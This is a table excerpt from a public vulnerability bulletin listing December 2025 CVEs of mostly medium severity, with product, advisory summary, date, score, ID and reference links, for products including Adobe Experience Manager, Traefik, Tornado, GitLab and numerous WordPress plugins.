| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64858 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64861 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64863 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64869 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64873 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64875 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64881 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64887 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64888 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 5.5 | CVE-2025-64894 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--Creative Cloud Desktop | Creative Cloud Desktop versions 6.4.0.361 and earlier are affected by a Creation of Temporary File in Directory with Incorrect Permissions vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to disrupt the application's functionality by manipulating temporary files. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 5.5 | CVE-2025-64896 | https://helpx.adobe.com/security/products/creative-cloud/apsb25-120.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Access Control vulnerability. A low privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized write access potentially resulting in denial of service. Exploitation of this issue requires user interaction. | 2025-12-09 | 5.6 | CVE-2025-64897 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| libimobiledevice--usbmuxd | A Path Traversal vulnerability in usbmuxd allows local users to escalate to the service user. This issue affects usbmuxd: before 3ded00c9985a5108cfc7591a309f9a23d57a8cba. | 2025-12-10 | 5.7 | CVE-2025-66004 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66004 |
| okta--okta-sdk-java | Okta Java Management SDK facilitates interactions with the Okta management API. In versions 21.0.0 through 24.0.0, specific multithreaded implementations may encounter memory issues as threads are not properly cleaned up after requests are completed. Over time, this can degrade performance and availability in long-running applications and may result in a denial-of-service condition under sustained load. In addition to using the affected versions, users may be at risk if they are implementing a long-running application using the ApiClient in a multi-threaded manner. This issue is fixed in version 24.0.1. | 2025-12-10 | 5.3 | CVE-2025-66033 | https://github.com/okta/okta-sdk-java/security/advisories/GHSA-qhr6-6cgv-6638 https://github.com/okta/okta-sdk-java/commit/1daa9229a70fc38fb252aeaa637f82d0b0729b3f |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66320 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66321 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66322 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Vulnerability of improper criterion security check in the card module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.3 | CVE-2025-66323 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Versions 3.5.0 through 3.6.2 have inverted TLS verification logic in the nginx.ingress.kubernetes.io/proxy-ssl-verify annotation. Setting the annotation to "on" (intending to enable backend TLS certificate verification) actually disables verification, allowing man-in-the-middle attacks against HTTPS backends when operators believe they are protected. This issue is fixed in version 3.6.3. | 2025-12-09 | 5.9 | CVE-2025-66491 | https://github.com/traefik/traefik/security/advisories/GHSA-7vww-mvcr-x6vj https://github.com/traefik/traefik/commit/14a1aedf5704673d875d210d7bacf103a43c77e4 https://github.com/traefik/traefik/releases/tag/v3.6.3 |
| Zoom Communications Inc.--Zoom Rooms | External control of file name or path in Zoom Rooms for macOS before version 6.6.0 may allow an authenticated user to conduct a disclosure of information via local access. | 2025-12-10 | 5 | CVE-2025-67461 | https://www.zoom.com/en/trust/security-bulletin/zsb-25051 |
| machphy--mad-proxy | mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication. | 2025-12-10 | 5.3 | CVE-2025-67485 | https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482 |
| auth0--nextjs-auth0 | The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1. | 2025-12-10 | 5.4 | CVE-2025-67490 | https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-wcgj-f865-c7j7 https://github.com/auth0/nextjs-auth0/commit/26cc8a7c60f4b134700912736f991a25bd6bbf0b |
| remram44--taguette | Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2. | 2025-12-09 | 5.4 | CVE-2025-67502 | https://github.com/remram44/taguette/security/advisories/GHSA-5923-r76v-mprm https://github.com/remram44/taguette/commit/67de2d2612e7e2572c61cd9627f89c2bfd0f2a36 |
| auth0--nextjs-auth0 | The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0. | 2025-12-11 | 5.7 | CVE-2025-67716 | https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5 https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, the supplied reason phrase is used unescaped in HTTP headers (where it could be used for header injection) or in HTML in the default error page (where it could be used for XSS) and can be exploited by passing untrusted or malicious data into the reason argument. Used by both RequestHandler.set_status and tornado.web.HTTPError, the argument is designed to allow applications to pass custom "reason" phrases (the "Not Found" in HTTP/1.1 404 Not Found) to the HTTP status line (mainly for non-standard status codes). This issue is fixed in version 6.5.3. | 2025-12-12 | 5.4 | CVE-2025-67724 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-pr2v-jx2c-wg9f https://github.com/tornadoweb/tornado/commit/9c163aebeaad9e6e7d28bac1f33580eb00b0e421 https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| sequoia-pgp--sequoia | In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet. | 2025-12-14 | 5.3 | CVE-2025-67897 | https://gitlab.com/sequoia-pgp/sequoia/-/commit/b59886e5e7bdf7169ed330f309a6633d131776e5 https://bugs.debian.org/1122582 https://gitlab.com/sequoia-pgp/sequoia/-/blob/b59886e5e7bdf7169ed330f309a6633d131776e5/openpgp/NEWS#L7-L26 |
| kristapsdz--openrsync | openrsync through 0.5.0, as used in OpenBSD through 7.8 and on other platforms, allows a client to cause a server SIGSEGV by specifying a length of zero for block data, because the relationship between p->rem and p->len is not checked. | 2025-12-14 | 5.3 | CVE-2025-67901 | https://github.com/kristapsdz/openrsync/issues/34 https://github.com/openbsd/src/blob/60b9c3dff1abf933e85e3c4d96b54201ee947513/usr.bin/rsync/blocks.c#L480-L481 |
| TalentSoft Software--UNIS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software UNIS allows Reflected XSS. This issue affects UNIS: before 42957. | 2025-12-09 | 5.4 | CVE-2025-6923 | https://www.usom.gov.tr/bildirim/tr-25-0435 |
| TalentSoft Software--e-BAP Automation | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software e-BAP Automation allows Reflected XSS. This issue affects e-BAP Automation: before 42957. | 2025-12-09 | 5.4 | CVE-2025-6924 | https://www.usom.gov.tr/bildirim/tr-25-0434 |
| templateinvaders--TI WooCommerce Wishlist | The TI WooCommerce Wishlist plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.10.0. This is due to the plugin accepting hidden fields and not limiting the values or data that can input and is later output. This makes it possible for unauthenticated attackers to inject arbitrary HTML into wishlist items. | 2025-12-13 | 5.3 | CVE-2025-9207 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d08d381-d0ef-4f40-975d-51e919a7c872?source=cve https://plugins.trac.wordpress.org/browser/ti-woocommerce-wishlist/trunk/includes/wishlist.class.php#L326 https://plugins.trac.wordpress.org/browser/ti-woocommerce-wishlist/trunk/includes/wishlist.class.php#L544 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399224%40ti-woocommerce-wishlist&new=3399224%40ti-woocommerce-wishlist&sfp_email=&sfph_mail= |
| Repute Infosystems--ARMember | Missing Authorization vulnerability in Repute Infosystems ARMember allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ARMember: from n/a through 3.4.10. | 2025-12-09 | 4.3 | CVE-2022-47425 | https://vdp.patchstack.com/database/wordpress/plugin/armember-membership/vulnerability/wordpress-armember-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-3-4-10-broken-access-control?_s_id=cve |
| Taylor Hawkes--WP Fast Cache | Cross-Site Request Forgery (CSRF) vulnerability in Taylor Hawkes WP Fast Cache allows Cross Site Request Forgery. This issue affects WP Fast Cache: from n/a through 1.5. | 2025-12-09 | 4.3 | CVE-2023-22675 | https://vdp.patchstack.com/database/wordpress/plugin/wp-fast-cache/vulnerability/wordpress-wp-fast-cache-plugin-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| creativthemes--Mavix Education | The Mavix Education theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mavix_education_activate_plugin' AJAX action in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate the Creativ Demo Importer plugin. | 2025-12-13 | 4.3 | CVE-2025-11164 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8e57528-010f-4ec6-917b-4cd8c3fdbd58?source=cve https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=297888%40mavix-education&new=297888%40mavix-education |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.2 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to disclose sensitive information from private projects by executing specifically crafted GraphQL queries. | 2025-12-11 | 4.3 | CVE-2025-11247 | GitLab Issue #573766 HackerOne Bug Bounty Report #3307422 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| emplibot--Emplibot AI Content Writer with Keyword Research, Infographics, and Linking | SEO Optimized | Fully Automated | The Emplibot - AI Content Writer with Keyword Research, Infographics, and Linking | SEO Optimized | Fully Automated plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.9 via the emplibot_call_webhook_with_error() and emplibot_process_zip_data() functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-13 | 4.4 | CVE-2025-11970 | https://www.wordfence.com/threat-intel/vulnerabilities/id/095c6359-112d-4abc-a69b-a623dfd103c0?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398720%40emplibot&new=3398720%40emplibot&sfp_email=&sfph_mail= |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.2.2. This is due to missing or incorrect nonce validation on the 'location_delete' action. This makes it possible for unauthenticated attackers to delete locations via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-12407 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a99d0220-38af-40fe-8b9f-af173fc41248?source=cve https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php |
| edge22--GenerateBlocks | The GenerateBlocks plugin for WordPress is vulnerable to information exposure due to missing object-level authorization checks in versions up to, and including, 2.1.2. This is due to the plugin registering multiple REST API routes under `generateblocks/v1/meta/` that gate access with `current_user_can('edit_posts')`, which is granted to low-privileged roles such as Contributor. The handlers accept arbitrary entity IDs (user IDs, post IDs, etc.) and meta keys, returning any requested metadata with only a short blacklist of password-like keys for protection. There is no object-level authorization ensuring the caller is requesting only their own data, and there is no allowlist of safe keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to exfiltrate personally identifiable information (PII) and other sensitive profile data of administrator accounts or any other users by directly querying user meta keys via the exposed endpoints via the `get_user_meta_rest` function. In typical WordPress + WooCommerce setups, this includes names, email, phone, and address fields that WooCommerce stores in user meta, enabling targeted phishing, account takeover pretexting, and privacy breaches. | 2025-12-13 | 4.3 | CVE-2025-12512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6affdb56-39cc-4749-b7cb-b80b7666f028?source=cve https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L56 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L297 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L61 https://plugins.trac.wordpress.org/changeset/3415721/generateblocks/trunk/includes/class-meta-handler.php |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4 via the 'get_attachment_sizes' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the path and meta data of private attachments, which can be used to view the attachments. | 2025-12-09 | 4.3 | CVE-2025-12558 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb2f6c67-ef4a-4afc-bd61-6c0185e354a8?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L71 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L216 https://plugins.trac.wordpress.org/changeset/3406987 |
| premmerce--Premmerce Brands for WooCommerce | The Premmerce Brands for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveBrandsSettings function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify brand permalink settings. | 2025-12-12 | 4.3 | CVE-2025-12783 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6560ba0b-2190-4d30-b0c4-f07d524ccfde?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-brands/tags/1.2.13/src/Admin/Admin.php#L101 |
| IBM--InfoSphere Information Server | IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2025-12-08 | 4.6 | CVE-2025-12832 | https://www.ibm.com/support/pages/node/7253507 |
| Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co.--DijiDemi | Authorization Bypass Through User-Controlled Key vulnerability in Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co. DijiDemi allows Exploitation of Trusted Identifiers. This issue affects DijiDemi: through 28.11.2025. | 2025-12-10 | 4.3 | CVE-2025-13125 | https://www.usom.gov.tr/bildirim/tr-25-0442 |
| imaqpress--IMAQ CORE | The IMAQ Core plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the URL structure settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's URL structure settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13363 | https://www.wordfence.com/threat-intel/vulnerabilities/id/684de9c5-6f94-455d-b095-9f2df733ab95?source=cve https://plugins.trac.wordpress.org/browser/imaq-core/trunk/libs/AcademixCorePermalink.php#L58 https://plugins.trac.wordpress.org/browser/imaq-core/tags/1.2.1/libs/AcademixCorePermalink.php#L58 |
| frapesce--Rabbit Hole | The Rabbit Hole plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the plugin's reset functionality. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The vulnerability is exacerbated by the fact that the reset operation is performed via a GET request, making exploitation trivial via image tags or hyperlinks. | 2025-12-12 | 4.3 | CVE-2025-13366 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eab5de7e-ddab-4c6f-af87-acce7b5ff15b?source=cve https://plugins.trac.wordpress.org/browser/rabbit-hole/trunk/functions/admin.php#L7 https://plugins.trac.wordpress.org/browser/rabbit-hole/tags/1.1/functions/admin.php#L7 |
| foxtheme--Foxtool All-in-One: Contact chat button, Custom login, Media optimize images | The Foxtool All-in-One: Contact chat button, Custom login, Media optimize images plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the foxtool_login_google() function. This makes it possible for unauthenticated attackers to establish an OAuth Connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13408 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40886b66-f6a2-404c-9d0d-5fc3da6a896c?source=cve https://plugins.svn.wordpress.org/foxtool/tags/2.5.2/inc/goo.php https://wordpress.org/plugins/foxtool/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416529%40foxtool&new=3416529%40foxtool&sfp_email=&sfph_mail= |
| specialk--Simple Download Counter | The Simple Download Counter plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.2.2. This is due to insufficient path validation in the `simple_download_counter_parse_path()` function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which may contain sensitive information such as database credentials (wp-config.php) or system files. Please note that the vendor opted to continue to allow remote file downloads from arbitrary locations on the server, however, has disabled this functionality on multi-sites and provided a warning to site owners in the readme.txt when they install the plugin. While not an optimal patch, we have considered this sufficient and recommend users proceed to use the plugin with caution. | 2025-12-10 | 4.9 | CVE-2025-13677 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b82a0f71-29d7-469a-8c69-5ab68d599cb9?source=cve https://plugins.trac.wordpress.org/browser/simple-download-counter/trunk/inc/functions-admin.php#L566 https://plugins.trac.wordpress.org/browser/simple-download-counter/tags/2.2.2/inc/functions-admin.php#L566 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3409876%40simple-download-counter&new=3409876%40simple-download-counter&sfp_email=&sfph_mail= |
| maartenbelmans--Advanced Product Fields (Product Addons) for WooCommerce | The Advanced Product Fields (Product Addons) for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.17. This is due to missing or incorrect nonce validation on the 'maybe_duplicate' function. This makes it possible for unauthenticated attackers to duplicate and publish product field groups, including draft and pending field groups, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-09 | 4.3 | CVE-2025-13924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8906333-7024-40d3-91cd-2ecbbf20314f?source=cve https://github.com/Baodaica/advanced-product-fields-for-woocommerce/blob/main/class-admin-controller.php#L130-L133 https://plugins.trac.wordpress.org/changeset/3411740/ |
| thewellnessway--TWW Protein Calculator | The TWW Protein Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Header' setting in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-13971 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b57749db-0a47-44f8-8607-d0d962c5ced2?source=cve https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-compact.php#L19 https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-large.php#L32 https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-compact.php#L19 https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-large.php#L32 |
| watchtowerhq--WatchTowerHQ | The WatchTowerHQ plugin for WordPress is vulnerable to arbitrary file read via the 'wht_download_big_object_origin' parameter in all versions up to, and including, 3.15.0. This is due to insufficient path validation in the handle_big_object_download_request function. This makes it possible for authenticated attackers, with administrator-level access and a valid access token, to read arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys. | 2025-12-12 | 4.9 | CVE-2025-13972 | https://www.wordfence.com/threat-intel/vulnerabilities/id/13fcbff8-8560-48ca-82df-8b620961d9c6?source=cve https://plugins.trac.wordpress.org/browser/watchtowerhq/tags/3.15.0/src/Download.php#L104 https://plugins.trac.wordpress.org/browser/watchtowerhq/trunk/src/Download.php#L104 |
| izuchy--Contact Form 7 with ChatWork | The Contact Form 7 with ChatWork plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'api_token' and 'roomid' settings in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the settings page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-13975 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f5d8616b-8757-426e-a4ae-bd851d35e296?source=cve https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/tags/1.1.0/contact-form-7-chatwork.php#L80 https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/tags/1.1.0/contact-form-7-chatwork.php#L89 https://plugins.trac.wordpress.org/browser/contact-form-7-with-chatwork/trunk/contact-form-7-chatwork.php#L80 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.5 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to discover the names of private projects they do not have access through API requests. | 2025-12-11 | 4.3 | CVE-2025-13978 | https://gitlab.com/gitlab-org/gitlab/-/work_items/566960 GitLab Issue #566960 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| codnloc--Purchase and Expense Manager | The Purchase and Expense Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing nonce validation on the 'sup_pt_handle_deletion' function. This makes it possible for unauthenticated attackers to delete arbitrary purchase records via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13987 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c9826506-2292-44a7-9564-832e54bf4fba?source=cve https://plugins.trac.wordpress.org/browser/purchase-and-expense-manager/trunk/purchase-and-expense-manager.php#L604 https://plugins.trac.wordpress.org/browser/purchase-and-expense-manager/tags/1.1.2/purchase-and-expense-manager.php#L604 |
| jeremybmerrill--DebateMaster | The DebateMaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the color options in the plugin settings in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page with the debate shortcode. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 4.4 | CVE-2025-14035 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a68cb059-972f-473d-90cb-41ccda052b08?source=cve https://wordpress.org/plugins/debatemaster/ https://plugins.trac.wordpress.org/browser/debatemaster/trunk/debatemaster.php#L30 https://plugins.trac.wordpress.org/browser/debatemaster/tags/1.0.0/debatemaster.php#L30 https://plugins.trac.wordpress.org/browser/debatemaster/trunk/debatemaster.php#L87 https://plugins.trac.wordpress.org/browser/debatemaster/tags/1.0.0/debatemaster.php#L87 |
| apprhyme--URL Media Uploader | The URL Media Uploader plugin for WordPress is vulnerable to unauthorized safe file uploads due to a missing capability check on the url_media_uploader_url_upload_ajax_handler() function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload safe media files. | 2025-12-12 | 4.3 | CVE-2025-14045 | https://www.wordfence.com/threat-intel/vulnerabilities/id/57f09da9-0d2c-45db-b3ed-19a7c9f5a001?source=cve https://plugins.trac.wordpress.org/browser/url-media-uploader/trunk/url-media-uploader.php#L52 https://gist.github.com/jasoncarle/925401bb11833b1ced2342390e20718e https://plugins.trac.wordpress.org/browser/url-media-uploader/tags/1.0.1/url-media-uploader.php#L52 |
| jonahsc--SimplyConvert | The SimplyConvert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'simplyconvert_hash' option in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 4.4 | CVE-2025-14048 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d720466-e470-46a3-8129-3e58e1928f0d?source=cve https://plugins.trac.wordpress.org/browser/simplyconvert/trunk/simplyconvert.php#L137 https://plugins.trac.wordpress.org/browser/simplyconvert/tags/1.0/simplyconvert.php#L137 |
